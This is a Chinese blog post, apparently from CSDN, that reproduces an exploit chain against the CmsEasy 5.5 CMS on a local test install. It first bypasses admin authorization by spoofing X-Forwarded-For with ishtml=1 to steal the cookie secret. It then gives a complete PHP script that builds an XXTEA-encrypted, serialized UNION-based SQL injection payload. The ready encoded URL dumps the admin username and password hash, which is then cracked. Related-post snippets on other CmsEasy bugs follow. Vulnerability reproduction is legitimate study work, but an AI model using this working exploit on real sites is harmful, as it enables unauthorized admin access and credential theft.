Cmseasy_5.5的SQL注入

最新推荐文章于 2024-08-12 01:52:32 发布
最新推荐文章于 2024-08-12 01:52:32 发布
阅读量417 收藏 3
点赞数 4
文章标签: 服务器 数据库 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62903168/article/details/141039433
版权

未授权访问进入后台获取Cookie安全码

在cmseasy目录下的lib/admin/admin.php中有这么一句代码,可以让我们实现未授权访问进入到cmseasy的后台获取Cookie安全码,为我们后期的注入做准备。

if($servip==front::ip()&&front::get('ishtml')==1) return;

这句代码的意思是,当servip与客户的ip相等的时候以及ishtml=1时,可以不需要检查你是否为admin,直接进入到后台。

如何进入到后台

根据代码分析,满足上述的两个条件就可未授权进入后天,ishtml可以直接在网址栏中写inhtml=1;那么IP呢?我们自己的IP肯定跟服务器的IP不一样,那么我们怎么让我们的IP一样呢,这就要看IP的获取方法了。

这就是获取IP的方法,其中HTTP_X_FORWARDED_FOR这个是可以进行伪造的,这就好办了。

我用的是Firefox浏览器,有一个插件的名字是上图这个,它可以实现伪造IP,如何获取服务器的IP就太简单了,ping也可以,nslookup也可以,我是在自己的主机上搭建的,所以就填写127.0.0.1。

这样就满足了上述的两个条件,就可以实现未授权访问后台。

http://127.0.0.1/cmseasy/index.php?case=config&act=system&admin_dir=admin&site=default&ishtml=1

在网址栏中输入以上代码,就可进入后台。

这样就拿到了cookie安全码。

SQL注入获取管理员账号密码

在admin_act.php中有这样一个函数,remotelogin_action(),其中有这么两行代码。

 $args = xxtea_decrypt(base64_decode(front::$args), config::get('cookie_password'));
 $user=$user->getrow(unserialize($args));

这对args和拿出来的Cookie安全码进行了base64得解码,再进行解密,再进行反序列化;本来这个Cookie安全码是登录之后才能获得的,现在通过未授权登录到后台已经提前拿到了,那我们接下来所需要做的就是与其相反的步骤,它解码那我就编码,根据顺序就是序列化、加密、base64编码。

那么我们首先就是需要把上述需要用到的函数找到,将拿到的cookie安全码输入进去。

<?php

$args = 'ad1efdac86de472006ea67971f0d7b14';

$table = array(
    'userid`=-1 union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from cmseasy_user limit 0,1#'=>1
);

echo base64_encode(xxtea_encrypt(serialize($table),$args));

function xxtea_encrypt($str, $key) {
    if ($str == "") {
        return "";
    }
    $v = str2long($str, true);
    $k = str2long($key, false);
    if (count($k) < 4) {
        for ($i = count($k); $i < 4; $i++) {
            $k[$i] = 0;
        }
    }
    $n = count($v) - 1;

    $z = $v[$n];
    $y = $v[0];
    $delta = 0x9E3779B9;
    $q = floor(6 + 52 / ($n + 1));
    $sum = 0;
    while (0 < $q--) {
        $sum = int32($sum + $delta);
        $e = $sum >> 2 & 3;
        for ($p = 0; $p < $n; $p++) {
            $y = $v[$p + 1];
            $mx = int32((($z >> 5 & 0x07ffffff) ^ $y << 2) + (($y >> 3 & 0x1fffffff) ^ $z << 4)) ^ int32(($sum ^ $y) + ($k[$p & 3 ^ $e] ^ $z));
            $z = $v[$p] = int32($v[$p] + $mx);
        }
        $y = $v[0];
        $mx = int32((($z >> 5 & 0x07ffffff) ^ $y << 2) + (($y >> 3 & 0x1fffffff) ^ $z << 4)) ^ int32(($sum ^ $y) + ($k[$p & 3 ^ $e] ^ $z));
        $z = $v[$n] = int32($v[$n] + $mx);
    }
    return long2str($v, false);
}

function long2str($v, $w) {
    $len = count($v);
    $n = ($len - 1) << 2;
    if ($w) {
        $m = $v[$len - 1];
        if (($m < $n - 3) || ($m > $n)) return false;
        $n = $m;
    }
    $s = array();
    for ($i = 0; $i < $len; $i++) {
        $s[$i] = pack("V", $v[$i]);
    }
    if ($w) {
        return substr(join('', $s), 0, $n);
    }
    else {
        return join('', $s);
    }
}

function str2long($s, $w) {
    $v = unpack("V*", $s. str_repeat("\0", (4 - strlen($s) % 4) & 3));
    $v = array_values($v);
    if ($w) {
        $v[count($v)] = strlen($s);
    }
    return $v;
}

function int32($n) {
    while ($n >= 2147483648) $n -= 4294967296;
    while ($n <= -2147483649) $n += 4294967296;
    return (int)$n;
}

这就是需要的代码。

最后得出这么一个结果,再将它输入进输入框之前需要把符号进行url编码,/-->%2f,+-->%2b。

http://127.0.0.1/cmseasy/index.php?case=admin&act=remotelogin&admin_dir=admin&site=default&args=WlkeL4Ctx6knDmOBj9rKc%2bBM2KaIdvkCrIu08TQiyBjdlH3znVEVRuwtIXXQyzRIPEP5xUCyIa6Rl88p3FbDC%2fQj0ST6W68Js4grleUZC4EEzAWPV3IbDzGyuquG%2f5Qj9QjVs3lWiLcoKdgxR6t%2fhijq39OTtf4HlsvM9Ldn8ZCM8rwJlAFyCQ5%2fD6jTGauhNZP2BfZhEgN7lGIe

输入以上代码后查看登录情况。

从这儿可以看出账号为admin,而密码是被md5加密过的一串密文,3Ae10adc3949ba59abbe56e057f20f883e,我们用MD5工具解密。

最后得到密码为123456

验证:

成功!!!!

槐序深巷里打雨伞的人
关注
sql注入pythonpoc_基于python编写PoC
weixin_39746241的博客
12-17 392
0x02 SQL Injection poc编写已知CmsEasy 5.5 UTF-8程序存在SQL注入,乌云漏洞中的漏洞细节比较详细(由于wooyun已经暂停访问,故不上链接了)。·首先,我们需要下载其相关源码,进行本地搭建。·阅读漏洞细节,我们得知其url与payload如下:URL:http://xxx.xxx/celive/live/header.phpPayload:xajax=Live...
易通企业网站系统CmsEasy v5.5 UTF8 build20130716
04-02
该源码是易通企业网站系统CmsEasy v5.5 UTF8 build20130716,源码系统易通企业网站系统也称易通企业网站程序,是易通公司开发中国首套免费提供企业网站模板的营销型企业网站管理系统,系统前台生成html、完全符合SEO、同时有在线客服、潜在客户跟踪、便捷企业网站模板制作、搜索引擎推广等功能的企业网站系统。 九州易通科技开发的核心产品易通企业网站系统(CmsEasy)是充分按照SEO最佳标准来开发,营销实用性非常强企业建站系统。灵活的静态化控制,可以自定义字段,自定义模板,自定义表单,自定义URL,交叉绑定分类,地区,专题等多元化定制大大增加了企业网站的各种需求空间。强大的模板自定义可以轻松打造出个性的栏目封面,文章列表,图片列表,下载列表,分类列表,地区列表等等。
易通企业网站系统CmsEasy v5.5 UTF8 build20140818
04-04
易通企业网站系统也称易通企业网站程序,是易通公司开发中国首套免费提供企业网站模板的营销型企业网站管理系统,系统前台生成html、完全符合SEO、同时有在线客服、潜在客户跟踪、便捷企业网站模板制作、搜索引擎推广等功能的企业网站系统。 九州易通科技开发的核心产品易通企业网站系统(CmsEasy)是充分按照SEO最佳标准来开发,营销实用性非常强企业建站系统。灵活的静态化控制,可以自定义字段,自定义模板,自定义表单,自定义URL,交叉绑定分类,地区,专题等多元化定制大大增加了企业网站的各种需求空间。强大的模板自定义可以轻松打造出个性的栏目封面,文章列表,图片列表,下载列表,分类列表,地区列表等等。 易通企业网站系统CmsEasy v5.5 UTF8 build20140818 更新日志: 修正2014.08日期前乌云、360库带漏洞
【代码审计】CmsEasy_v5.7 代码执行漏洞分析
12-02 2885
&#13; &#13; 0x00 环境准备&#13; CmsEasy官网:http://www.cmseasy.cn/&#13; 网站源码版本:CmsEasy_v5.7_UTF8-0208&#13; 程序源码下载:&#13; http://ftp.cmseasy.cn/CmsEasy5.x/CmsEasy_5.7_UTF-8_20180208.zip&#13; 测试网站首页...
cmseasy_5.5-SQL注入漏洞复现
最新发布
m0_68533808的博客
08-12 702
由下面三幅图可知,Cookie安全码编码,加密,反序列化后就可以用getrow函数去使用数据库了。以未授权方式拿到Cookie安全码,并通过Cookie安全码拿到数据库中的账号和密码。注:这里的+和/都需要再次编码,不然会被url识别为空格进行截断,无法正常运行。在火狐上下载X-Forwarded-For Header插件。运行后得到先序列号,然后再加密后然后再编码后的一个值。注:此网站模板是开源的所以可以看到一些后台代码。进入后拿去 Cookie安全码。+变为%2b,/变为%2f。如下图所示,获取成功。
Ajax post sql注入,cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
weixin_39778582的博客
08-05 426
摘要cmseasy前台无需登录直接获取敏感数据的SQL注入cmseasy 前台无�cmseasy前台无需登录直接获取敏感数据的SQL注入cmseasy 前台无视gpc的sql注入我下载的是最新版本的cmseasy,之前有人提过这里的漏洞,官方进行了修补,但是越修补,越捉急,直接看代码:这里是注册函数的地方celive.class.php(480-497):function xajax_live()...
cmseasy-sql注入
m0_65350813的博客
08-11 459
这段代码意思:拿到cookie码,将获得的grgs通过base64解码,xxtea_decrypt函数来解密,全部解密后,将参数进行反序列化(unserialize是反序列化函数),反序列化完后,放在getrow,这里getrow函数表示获取数据库一行。根据这个代码,我们考虑注入的一个条件,先是要拿到cookie,找到加密函数xxtea_encrypt。这是第一个漏洞,未授权账号密码,因为代码写的有问题,导致我可以通过代码审计获取到非法进入后台的方式。改:/>-----%2f +---->%2b。
cmseasy最新版SQL注入漏洞+Bypass 360webscan方法
离别歌
04-11 944
先下载最新版(2015-03-18):http://ftp.cmseasy.cn/CmsEasy5.x/CmsEasy_5.5_UTF-8_20150318.zip 经过神器比对,发现最...
CmsEasy crossall_act.php SQL注入漏洞.md
04-08
根据提供的文件信息,CmsEasy的crossall_act.php文件中存在一个SQL注入漏洞,这是在IT行业中常见的安全漏洞类型。SQL注入攻击者可以通过这个漏洞在数据库中执行恶意的SQL语句,从而对网站数据库进行非授权的操作。 ...
CMSeasy v5.5任意权限getshell
08-28
CMSeasy任意权限getshell
CmsEasy_5.5_UTF-8_20140605
08-20
安全 内置360安全杀毒脚本 确保企业网站安全运行无忧 效率 涵盖全部企业所需功能 减轻网站管理负担 稳定 历经商业市场考验4年 企业用户超过30万
CmsEasy_5.5_UTF-8_20130716
08-20
开发语言:PHP5.0 数据库:MySQL 5.0 组件:Zend (PHP5.3需 ZendGuardLoader) 系统环境:Window Server 或者Linux 扩展:MySQLi 函数:gzinflate
CmsEasy_UTF-8.rar_CmsEasy_UTF-8_en_PHP 企业网站_企业网站_网站管理
09-20
CmsEasy_UTF-8.rar】是一个压缩包文件,其中包含了一个名为"CmsEasy"的UTF-8编码的中文企业网站管理系统。这个系统是专为建立企业网站而设计的,其核心特性在于其小巧、高效和人性化的操作界面。根据描述,易通...
基于phpstudy对cmseasy5.5进行漏洞复现
wzzzzz06的博客
08-11 588
还用到了condition()和rec_select_one()函数,而condition()就在getrow()下面,现在要继续追代码rec_select_one()了。将该函数及其内部用到的其他函数一起复制到一个新建的index.php内:str2long(),long2str(),int32()思考:追代码很耗时耗精力,代码审计同样如此,即使是复现漏洞也不敢说完全能看懂,有时候debug能用还是用一下比较好。#字符串内的+,/都要进行unicode编码,其中+为%2d,/为%2f。
sql注入pythonpoc_python poc是什么
weixin_39627052的博客
12-17 247
如今,PoC 的编写在我们安全研究团队是每个人必备的技能之一。那么,PoC是什么呢?我们应该如何优雅的来进行编写?0x00 我们需要掌握的几个的概念PoC(全称:Proof of Concept)中文意思是“观点证明”。在安全行业中PoC则是一段验证漏洞的程序,使我们能够确认这个漏洞是真实存在的。Python,是一种面向对象、解释型计算机程序设计语言。常见的一些库我们需要了解,比如:urllib,...
CMSEasySQL注入漏洞
此去清风白日,自由道风景好
09-03 1478
申明:分析分析,这个洞也不是我挖掘的。
CmsEasy crossall_act.php 深入分析:SQL注入漏洞详解
CmsEasySQL注入漏洞是一个严重的问题,需要立即采取措施进行修复,以保护网站数据的安全。对于使用CmsEasy的管理员来说,升级到不受影响的版本或应用安全补丁是防止此类攻击的关键步骤。同时,提高开发团队的安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值